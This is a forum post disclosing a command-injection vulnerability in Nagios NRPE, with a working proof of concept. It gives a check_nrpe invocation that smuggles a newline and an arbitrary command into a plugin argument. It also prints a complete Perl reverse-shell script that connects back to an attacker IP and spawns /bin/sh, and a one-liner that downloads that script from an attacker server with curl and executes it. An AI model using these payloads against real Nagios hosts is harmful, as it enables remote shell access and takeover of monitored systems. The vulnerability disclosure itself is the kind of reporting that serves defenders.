Announcement Announcement Module
Collapse
No announcement yet.
NRPE Remote Command Execution Page Title Module
Move Remove Collapse
X
Conversation Detail Module
Collapse
  • Filter
  • Time
  • Show
Clear All
new posts

  • NRPE Remote Command Execution

    Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could allow an attacker to remotely inject and execute arbitrary code on the host under NRPE user ('nagios'). The vulnerability is due to NRPE not properly sanitizing user input before passing it to a command shell as a part of a configured command.

    POC
    ---
    To execute an arbitrary command an attacker could simply add a new line character after a parameter and follow it with his own command.

    To run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments:

    Code:
    # /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
    which make NRPE daemon run the following series of commands:

    Code:
    /usr/local/nagios/libexec/check_users -w <new_line>
    touch /tmp/vulntest
    # -c 4
    and a file /tmp/vulntest would be created with nagios user as the owner. The hash character is to comment out the the rest of the arguments.

    An attacker can also download code from the web by using wget or curl command and get a reverse shell. This would allow unrestricted access to the command line:


    Code:
    #!/usr/bin/perl
    
    use Socket;
    
    #attackers ip to connect back to
    $i="10.10.10.40";
    
    $p=8080;
    
    socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp") );
    
    if(connect(S,sockaddr_in($p,inet_aton($i))))
    
    {
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
    }

    /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 "

    more info:
    http://1337day.com/exploit/22164
    Last edited by prajith; 20th April 2014, 05:01 AM.
Tag Cloud Tag Cloud Module
Collapse
Working...
X